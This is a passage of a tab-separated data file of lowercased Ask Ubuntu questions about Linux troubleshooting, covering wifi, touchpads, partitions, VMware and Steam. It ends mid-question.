391794	convert `` h264 mp4 avc ( part 10 ) ( avc1 ) '' / '' mpeg aac 48khz '' 1080p 23.976000fps videos to 720p , as complete quality as possible	file says all the files are iso media , mpeg v4 system , version 2 and the title 's info is from vlc 2.0.9 . imo 1080p is n't necessary , especially since the other vids from earlier are 720p and are just fine ; i do n't know and are n't sure but i think all these vids are hd , which explains their size . the rest of the info given by vlc during playback , for completeness : decoded format : planar 4:2:0 yuv i 've found not just one answer and they all use ffmpeg but avconv is the successor ; i know , they 're same thing , for most part at least . i know from experience avconv does n't accept some options designed for ffmpeg . not to mention that both have options which sound similar within same program but have totally different results .
391796	how to keep your terminal running when laptop lid is closed	this my first time using ask ubuntu so something might go wrong i am running ubuntu 13.10 on a laptop . i 'm making a server ( not a ubuntu server ) and i need to 24/7 , i normally have my laptop charging and the lid closed . i just need to find out how to let my ubuntu terminal running even if my lid is closed , and when its not charged . regards , tom
391798	video editing app for lowering background noise while evidentiating slow voice ?	i got a video who needs some delicate tweaks . in that video i recite several poems . my voice sounds too low , while the background noise is too high . if someone turns its sound at maximum to be able to hear and understand me , his ears will be hurt by the final applauses . so , i really need to edit this video before i can make it public , but , as you can see , this task is very delicate and complicated . i was not able to find a proper solution for it while i was using windows . now , that i am a new linux user , the task gets even harder . but i hope that with your help and your vast experience , i can find the right app for this . i know that there is a list of video editing software on the wiki section of askubuntu site , but that list by itself , ca n't help me . i need an exact answer from someone who went trough the same problem and found the solution . please , take into consideration the fact that i am a newbie in linux and i have a gnome environment on my pc .
391800	how to get it filmscan35 i installed & working on ubuntu 12.04 lts	the device is a itns-300 35mm neg/slide scanner labeled filmscan35 i . it is usb powered , and the installation cd from innovative technology is 'for ' xp thru win7 . i assume it is much like a standard scanner in miniature , altho the software has negative reversal , bw/color options , and a few other controls . the wine database does not seem to include this device at all . q : is solving this likely to be really too difficult for a novice ? q : is wine the best approach , or is something 'other scanner ' more likely to work out ? thanks !
391802	moved /home to a separate partition , now i ca n't log into it	i looked at this and that then attempted to move /home to a ( pre-existing ) partition . now i am unable to log into it . i tried to use chown in recovery mode as per the psychocats tutorial , only to be told that /home/username does n't exist . but when i run 'locate username ' , it 's the first directory listed . what did i miss ?
391804	back arrow key is random	i 'm using lubuntu . for whatever reason , the left arrow key will not work . at least , not consistently . i can go up , down , right , and backspace , but the left arrow key will work only on a seldom basis , otherwise it does nothing . i checked out the preference settings for my keyboard and do n't see anything relevant to input . at least , not to my knowledge . ( i 'm certainly a newb . ) how can i give my left arrow key life again ?
391807	samsung series 3 runnint ubuntu 12.04 , battery indicator does not recognize when i unplug my charger	i have a samsung series 3 ( np305e5a-s01ca ) running 12.04 , everything has been running great except for the battery and power management programs . even when my ac charger is unplugged and it is running on battery , it still says charging . even when i go into settings .
391809	how to install eldy ?	i tried to install eldy ( www.eldy.eu ) on my computer running ubuntu 12.04 and experienced problems . i ran the following terminal command : apt-get install sun-java6-jre and received an error that the software was not available . without it i could not install eldy . there was a .deb available , but it could not be installed without sun-java6-jre . sources : deb.vegans.it eldy.eu
391815	do i need more ram to avoid repeating standstills in tf2 ?	ok i built my pc 2-3 days ago . got ubuntu 12.04 lts up and running . got my nvidia gt220 card finally working and now when i play tf2 it plays fine but after about 15 mins of gameplay it pretty much came to a standstill on a loading screen . my mouse started to lag and barely move after a while . this also happened on dota 2 . i believe it 's my ram . i have a mushkin 2gb ddr3 installed . when i look at the hardware , though , it shows it as 1.4gb . is lack of ram problem ? also my other parts are a amd a4 llano apu , msi a55m-p33 mobo , and the os and games are on a toshiba 500gb laptop hdd . can anyone give any insight to this ?
391819	ubuntu 13.10 usb installation does not give installation type window	retyped for more information i tried to install ubuntu 13.10 ( removing windows and replacing it with linux ) , but the window that asks if you want to format the drive , install alongside , or something else does n't show up . instead , it shows a blank partition table ( which is what you get when you select something else ) . interacting with anything on it besides back and quit will give the error `` ubuntu 13.10 has encountered an internal error . '' i 'm not at all sure what 's going on , since i did a dual-boot with the same usb stick on a different computer . i tried to download the installer again , formatted the usb stick and put it back on . still giving the same result , so it must be at the fault of either the computer or the hdd . other information : using a usb installer tried installing through the livecd , but nothing changes . i attempted another dual boot on the same computer . everything worked fine , but the final installation ( after the keyboard setup and such was done ) hung . i waited for a whole 6 hours before i decided to cancel . it then said installation was finished and needed to be restarted . before i even get into the menu where i select the operating system , i get the `` error : no such device xxxx-xxxx-xxxx-xxxx grub rescue : `` problem so i could n't boot into any os . i formatted the drive , then ran windows boot repair and everything worked out . now i just want to replace windows 7 . wubi works , but i want to remove windows 7 and keep ubuntu , so that 's not a solution . neither 13.10 nor 12.04 lts work . the same problem happens . system information : manufacturer : gateway model : veriton m430 type : x64-based pc bios version/date : american megatrends inc. p01-a2 , 4/21/2010 processor : amd phenom ii x4 820 , 2800mhz gpu : amd radeon hd 6670 ram : 6144mb
391826	ubuntu install ( replacing elementary os ) fails after bios	i have an acer aspire m5-583p laptop which has elementaryos on it as its main os . i was going to replace it with ubuntu but while installing ( from usb drive ) an error occurred ; it stopped installing and logged me off . so i had to shutdown by holding the power button . when i try to reboot from the usb drive , after it gives me a selection from where to reboot from , it does n't do anything -- just stays at a black screen , instead of taking me to yumi to choose which distro to launch . so i restarted the laptop again this time choosing to go into bios but after i enter my password it goes to a black screen as well . ca n't do anything there.. so i restarted again and i just let it boot on its own and it just gets stuck on the acer logo menu where it says press f2 for bios or f12 for boot options.. i have no idea what to do , i am scared that my laptop has become corrupt and unusable .
391828	what do i do about malformed line 57	my skype crashed i tried to uninstall/re-install it through the software center but then that crashed ... . i was told that line 57 is malformed in source.list . the source list could not be read i am told that there may be unmet dependencies ... . i have no idea what this is about . can someone tell me precisely what to input at the console step by step , paint by the numbers otherwise its off to the repairman $ $ $ $ or a complete re-install of the entire system
391829	how to check network usage ?	as i was checking ( on the gnome system monitor that comes with 13.10 ) to see why synergy was lagging on my computer without a mouse and keyboard i saw a high total amount of data transmitted . i 've been seeing this for the last 3 days now and i was wondering if there is a way to monitor the network usage of each process individually ?
391838	epson stylus nx420 - scanner fails , prints ok	i 'm running ubuntu 12.04.3 . my epson stylus nx 420 printer works ok w/ its driver , but i ca n't get the scanner to work . it is connected to my network , and not directly plugged into my computer ( i think this info is of importance ) . what can i do , to get the scanner to work as well ?
391839	dash does not display the letter `` c ''	i saw a similar reference here but my issue is the letter `` c '' . up until yesterday , i did not have this issue . i have not installed any software or made hardware changes . i tried the solution from the enclosed link , but that has not resolved my issue . i am running ubuntu 13.10 , 64-bit , on an nvidia gts 450 card . could there have been a recent update that has caused this ? i update my system daily , if there are any updates .
391843	how to install every package from a custom repository ?	i made my own custom repository for my network . how do you install everything from a repository ? is it something like : sudo apt-get install -y myrepo : * or sudo apt-get install -y *
391844	ubuntu will not run in windows 8.1	i loaded ubuntu from a dvd using the boot menu [ esc f9 ] and worked through the various screens . it appeared to be a solid installation , but it will not run at all . windows claims there are files missing although the 2 files in question are sitting in c : \ has ms jimmied 8.1 so that a linux install is impossible ?
391845	move `/home` to new partition	i installed 12.04 over a prior ( experimental ) install of 10.10 . somehow in the setup , i did not specify that /home be set to a separate ( extended ) partition ( /dev/sda7 ) . so the install set up /home on the /root partition , and i am now in a right serious muddle . i would like to 1 ) tell it to set /home to sda7 ( permanently so that it boots each time that way ) , and 2 ) move my existing /home from my old workhorse 10.04 to /home on this 12.04 computer . ( i remember that one creates a tarball on the source computer , copies it over to the target computer , then extracts the tarball on the new computer . but i do n't know , and do n't seem to find , the correct steps to do this . how to resolve this ? any guidance will be much appreciated . i use my computer heavily , but do n't seem to have many problems and consequently never get much past the noobie stage of linux in terms of using the terminal , so your kindness in laying out the steps will be most helpful .
391849	ubuntu 12.04 desktop package installed , but ca n't launch `` gnome-terminal '' , `` can not open display ''	i have install ubuntu desktop packages on a 12.04 lts server . x server comes up fine , gui works fine without any issues . however , when i tried to issue a terminal , i get can not open display , i find this strange since the x display is running . here 's a link of the screen i took from vnc viewer :
391852	new problem : dwm-156 not detecting at all	i 'm on ubuntu 12.04 . i have a new problem ... my new dongle dwm-156 does not deted at all . there are many posts on the stack that are similiar but those users have an issue with the device showing as a storage medium . as for my case , it does not even show that . however , if i try lsusb , it shows the device id as 2001 : a706 . what shall i do to fix this ? thanks !
391854	xresources not doing anything in 13.10	i 'm trying to understand the capabilities of .xresources yet i can not get it do do even the most simple of configurations . for instance , i want to be able to change the background color of my terminal . in my .xresources file i have : *background : # ffffff i save that and then run xrdb -merge ~/.xresources i have tried exiting the terminal , logging off then back on , and restarting . no luck . i know i could change the background by using edit -- > profile preferences -- > colors but i want to understand xresources
391855	steam not working . it needs a 32-bit libraries	steam needs to install these additional packages : libgl1-mesa-dri-lts-raring : i386 , libgl1-mesa-glx-lts-raring : i386 , libc6 : i386 [ sudo ] password for gedwards : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? press return to continue : and when i press return an error page comes up : you are missing the following 32-bit libraries and steam may not run : libc.so.6 how to solve this ?
391856	why did my server repeatedly request the packages.bz2 file from a mirror for 24 hours ?	one of our servers ended up using about 20 gb of data yesterday because it was repeatedly requesting the packages.bz2 file from a mirror . the requests began about 22:00 on sunday night , and stopped about 21:00 on the monday . there is nothing in the apt history , unattended-upgrades , or the system log to indicate why . all i can see is a bunch of blocked traffic in the ufw log from the mirror ip address - there are no rules to block this ip in the ufw setup , communication to the mirror is successful outside this period of unusual activity , so it looks like flood protection ( though i 've gone through the ufw configuration and could n't find this explicitly set ) . /var/log/apt/term.log and /var/log/apt/term.log have no entries after 6:45 last friday ( 2 whole days before the event started ) . /var/log/aptitude is empty since its creation over a year ago . auth.log shows normal cron activity for an ubuntu server - and not a lot else besides my logins and use of sudo when trying to diagnose the problems on there . there is nothing in cron.d calling apt or aptitude - and cron.daily has the same collection of scripts as other servers that are not misbehaving . i 've spoken with the sysadmin for the mirror - he was very helpful . this is how i found out that my server was requesting the packages.bz2 file repeatedly . he says that each request was fulfilled and closed correctly . so - what could have happened to start this process ? why would it go on for so long , and why did it just stop ? and one week later , it started again - still nothing in the logs to indicate why .
391857	12.04 lts server - no wifi	someone installed ubuntu 12.04 lts for me on my lenovo s210 ideapad but there 's no wifi access . and i ca n't ping anything other than the static ip . lspci -nnk |grep - e `` : '' -e driver |grep ath kernel driver in use : ath9k nm-tool shows wlan0 `` state '' is disconnected but i see valid entries in wireless access points . significant ? any idea how to fix whatever is broken ?
391858	clearing all private user data from chrome from the command line	after a cross-country move , i no longer physical access to a certain computer running ubuntu 12.04 , but i do have ssh access . i never plan on using chrome on that computer again , and i would like to clear my cookies , history , cache , and all other private data on that computer from the command line . i was surprised that i could n't find any google hits on this topic . here 's one that is close , but it only works for windows and/or osx . http : //apple.stackexchange.com/questions/61121/clear-out-chrome-history-from-command-line that site also includes the following warning : google chrome settings and storage represent user-selected preferences and information and must not be extracted , overwritten or modified except through google chrome defined apis . is that something to worry about in this case ?
391862	vmplayer installation error on ubuntu	when i try to install vmware player on ubuntu 12.04 lts i get the following error : unable to build kernel module . i saw in other similar questions that a suggested solution is to do the following : cd /lib/modules/ $ ( uname -r ) /build/include/linux sudo ln -s ../generated/utsrelease.h sudo ln -s ../generated/autoconf.h sudo ln -s ../generated/uapi/linux/version.h however , i do n't have the last file , version.h although i have installed the linux headers but no luck . i also tried to run sudo vmware-modconfig -- console -- install-all but it fails with the following message : tmp/vmware-root/modules/vmmon-only/linux/driver.c:40:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /tmp/vmware-root/modules/vmmon-only/linux/driver.o ] error 1 make [ 1 ] : *** [ _module_/tmp/vmware-root/modules/vmmon-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-44-generic' make : *** [ vmmon.ko ] error 2 make : leaving directory `/tmp/vmware-root/modules/vmmon-only' unable to install vmmon is there any other way to install the missing headers ? edit 1 the screen-shots bellow show what i see after i complete the installation
391863	does using an extended cache improve performance ?	does using a extended cache ( readyboost-like ) improves the overall performance ? i read a lot about it and some says that it 's just for old machines with low ram and also the 480mbit/s of usb2.0 was just too slow for cache , and others says that it improves no matter if you got high amounts of ram . i ask this , because the answers that i found were from a time where usb3.0 was not a standart thing like it 's now .
391864	12.04 - can not access wireless at work but can access it at home	i 'm new to ubuntu , and have n't used unix since my college days in the 90s . i just installed 12.04 and , after the update , it attached to my home wireless network just fine . unfortunately , at work no such luck . i tried everything i could think of , and scoured way too many possible answers here and elsewhere . still no luck . when i do a iwconfig at work vs. home and do a diff , here is what i get : $ diff iwconfig_office iwconfig_home 5,6c5,6 < eth1 ieee 802.11abg essid : off/any < mode : managed access point : not-associated -- - > eth1 ieee 802.11abg essid : '' evergreen '' > mode : managed frequency:2.437 ghz access point : 00:1c:10:8e : d5:89 8c8 < power management : off -- - > power management : on lspci at home and office are identical . at the office i have a motorola 3347 router ; at home a linksys wrt54gs . at the office i tried 128 bit wep as well as personal wpa/wpa2 . neither would connect . iwlist -scan ( note that wyolution2 is the connection i 'm trying to use ) : eth0 interface does n't support scanning . eth1 scan completed : cell 01 - address : 02:21:1e:4b:29 : a1 channel:1 frequency:2.412 ghz ( channel 1 ) quality=70/70 signal level=-23 dbm encryption key : on essid : '' wyolution2 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 000a77796f6c7574696f6e32 ie : unknown : 010582848b960c ie : unknown : 030101 ie : unknown : 2a0107 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32080c1218243048606c ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk cell 02 - address : 48 : f8 : b3:55 : e0 : f6 channel:1 frequency:2.412 ghz ( channel 1 ) quality=19/70 signal level=-91 dbm encryption key : on essid : '' county 10 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 0009436f756e7479203130 ie : unknown : 010882848b962430486c ie : unknown : 030101 ie : unknown : 050400010000 ie : unknown : 2a0102 ie : unknown : 2f0102 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1a7c181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601001700000000000000000000000000000000000000 ie : unknown : dd180050f204104a00011010440001021049000600372a000120 ie : unknown : dd090010180201f02c0000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 cell 03 - address : 24 : de : c6 : af:8e : c0 channel:1 frequency:2.412 ghz ( channel 1 ) quality=40/70 signal level=-70 dbm encryption key : on essid : '' hotspot_194a '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 000c486f7473706f745f31393441 ie : unknown : 010882840b160c121824 ie : unknown : 030101 ie : unknown : 050400010000 ie : unknown : 2a0102 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 2d1acc111bffff000000000000000000000000000000000000000000 ie : unknown : 3d16010019000000ff000000000000000000000000000000 ie : unknown : dd1e00904c33cc111bffff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c34010019000000ff000000000000000000000000000000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd0a00037f04010000000000 cell 04 - address : 24 : de : c6 : af:8e : c1 channel:1 frequency:2.412 ghz ( channel 1 ) quality=40/70 signal level=-70 dbm encryption key : on essid : '' '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 0000 ie : unknown : 010882840b160c121824 ie : unknown : 030101 ie : unknown : 050400010000 ie : unknown : 2a0102 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 2d1acc111bffff000000000000000000000000000000000000000000 ie : unknown : 3d16010019000000ff000000000000000000000000000000 ie : unknown : dd1e00904c33cc111bffff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c34010019000000ff000000000000000000000000000000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd0a00037f04010000000000 cell 05 - address : 00:21:1e:4b:29 : a0 channel:1 frequency:2.412 ghz ( channel 1 ) quality=70/70 signal level=-38 dbm encryption key : on essid : '' wyolution '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 000977796f6c7574696f6e ie : unknown : 010582848b960c ie : unknown : 030101 ie : unknown : 050c000200000000000000000000 ie : unknown : 2a0107 ie : unknown : 32080c1218243048606c cell 06 - address : fe : f5:28:44:3c : d8 channel:3 frequency:2.422 ghz ( channel 3 ) quality=36/70 signal level=-74 dbm encryption key : on essid : '' julie '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 00054a756c6965 ie : unknown : 010882848b961224486c ie : unknown : 030103 ie : unknown : 32040c183060 ie : unknown : 0706555320010b14 ie : unknown : 33082001020304050607 ie : unknown : 33082105060708090a0b ie : unknown : dd310050f204104a000110104400010210470010bc329e001dd811b28601fef528443cd8103c0001011049000600372a000120 ie : unknown : 050400010038 ie : unknown : dd310050f204104a000110104400010210470010bc329e001dd811b28601fef528443cd8103c0001011049000600372a000120 ie : unknown : 2a0104 ie : unknown : 2d1aee1117ffff000001000000000000000000000000000000000000 ie : unknown : 3d1603050000000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 ie : unknown : 0b0500001b127a ie : unknown : dd07000c4300000000 cell 07 - address : 00:0f : b3:8a:29 : d7 channel:6 frequency:2.437 ghz ( channel 6 ) quality=33/70 signal level=-77 dbm encryption key : on essid : '' lighthawk ! '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 22 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 000a4c696768744861776b21 ie : unknown : 010582848b962c ie : unknown : 030106 ie : unknown : 050400020000 ie : unknown : 2a0103 ie : unknown : 32080c1218243048606c ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk cell 08 - address : 9c : d3:6d : c1 : ad:35 channel:8 frequency:2.447 ghz ( channel 8 ) quality=44/70 signal level=-66 dbm encryption key : on essid : '' netgear14 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 00094e4554474541523134 ie : unknown : 010882840b162430486c ie : unknown : 030108 ie : unknown : 050400020000 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1afc181fffff000000000000000000000000000000000000000000 ie : unknown : 3d1608001300000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : unknown : dd310050f204104a00011010440001021047001012aebdacf164ea95d226fb0349bba2c4103c0001031049000600372a000120 ie : unknown : dd090010180200f0040000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 cell 09 - address : 00:1c:10 : a6 : bb:0a channel:6 frequency:2.437 ghz ( channel 6 ) quality=28/70 signal level=-82 dbm encryption key : on essid : '' lndrwy0304 do not use '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 00154c4e445257593033303420446f204e6f7420557365 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 050400010002 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : dd06001018020304 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk cell 10 - address : 50:3d : e5:30:63 : a1 channel:6 frequency:2.437 ghz ( channel 6 ) quality=27/70 signal level=-83 dbm encryption key : on essid : '' aissd '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 00056169737364 ie : unknown : 010882848b960c121824 ie : unknown : 030106 ie : unknown : 050400010000 ie : unknown : 2a0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk preauthentication supported ie : unknown : 32043048606c ie : unknown : dd180050f2020101840003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c334c101bffff000000000000000000000000000000000000000000 ie : unknown : 2d1a4c101bffff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c3406080800000000000000000000000000000000000000 ie : unknown : 3d1606080800000000000000000000000000000000000000 ie : unknown : dd0900037f01010000ff7f ie : unknown : dd0a00037f04010000000000 cell 11 - address : 00:12 : cf : b5:5e:20 channel:11 frequency:2.462 ghz ( channel 11 ) quality=39/70 signal level=-71 dbm encryption key : on essid : '' \x00\x00\x00\x00\x00\x00 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 12 mb/s ; 24 mb/s ; 36 mb/s bit rates:9 mb/s ; 18 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 0006000000000000 ie : unknown : 010882848b960c183048 ie : unknown : 03010b ie : unknown : 050400010000 ie : unknown : 2a0100 ie : unknown : 32041224606c ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk preauthentication supported ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 cell 12 - address : 00:1f : c4:8d : b1:80 channel:1 frequency:2.412 ghz ( channel 1 ) quality=22/70 signal level=-88 dbm encryplo interface does n't support scanning . tion key : on essid : '' qwest6528 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 0009717765737436353238 ie : unknown : 010582848b960c ie : unknown : 030101 ie : unknown : 050c010200000000000000000000 ie : unknown : 2a0107 ie : unknown : 32080c1218243048606c cell 13 - address : 24 : de : c6 : af:8e : e0 channel:11 frequency:2.462 ghz ( channel 11 ) quality=37/70 signal level=-73 dbm encryption key : on essid : '' hotspot_194a '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 6 mb/s 9 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 2660ms ago ie : unknown : 000c486f7473706f745f31393441 ie : unknown : 010882840b160c121824 ie : unknown : 03010b ie : unknown : 050400010000 ie : unknown : 2a0100 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 2d1acc111bffff000000000000000000000000000000000000000000 ie : unknown : 3d160b0019000000ff000000000000000000000000000000 ie : unknown : dd1e00904c33cc111bffff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c340b0019000000ff000000000000000000000000000000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd0a00037f04010000000000 note : i have half a dozen devices connected to this wireless access point already , including android devices , w7 and w8 . in addition , this specific machine had connected to it in the past before being re-purposed as a unbuntu box . any advice would be much appreciated !
391867	downloaded ubuntu , then fuduntu , now i ca n't edit grub on ubuntu ?	so i got ubuntu , got grub editor , all that . then i got fuduntu , and after all that was installed , it 's like overwriting my old grub . in ubuntu , i have it set so that grub has a particular order . but when i boot up , it 's like a different version of grub or something with a completely separate order and everything any ideaa how i can get my `` old '' grub back ? i guess fuduntu installed grub , but it like put it on top of the one i already had .
391868	touchpad does n't work but is recognized . after modprobe , it works but is n't recognized	i 'm having a kind of controversial problem here . i 've just installed ubuntu 12.04 lts , and my touchpad does not works . i 've already tried some fixes that i found but none of them worked perfectly . right now , the touchpad is recognized . xinput list gives me this : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ mosart semi . 2.4g keyboard mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=14 [ slave pointer ( 2 ) ] and synclient returns this : parameter settings : leftedge = 100 rightedge = 2408 topedge = 71 bottomedge = 1249 fingerlow = 1 fingerhigh = 1 fingerpress = 256 maxtaptime = 180 maxtapmove = 124 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 56 horizscrolldelta = 56 vertedgescroll = 1 horizedgescroll = 1 cornercoasting = 0 verttwofingerscroll = 0 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0706 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 226 edgemotionusealways = 0 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 0 rbcornerbutton = 0 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 0 tapbutton2 = 0 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.100007 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 14 verthysteresis = 14 clickpad = 0 the touchpad tab on mouse and touchpad shows up , and synaptiks work . but the touchpad does n't works . the mouse barely moves , and when it does it just teleports randomly through the screen . now if i type in the terminal sudo modprobe -r psmouse sudo modprobe psmouse proto=imps the mouse works almost perfectly . it moves normally , i can click with the buttons , tap , etc . but i ca n't configure it . after typing the commands on terminal , this is my xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ mosart semi . 2.4g keyboard mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=14 [ slave pointer ( 2 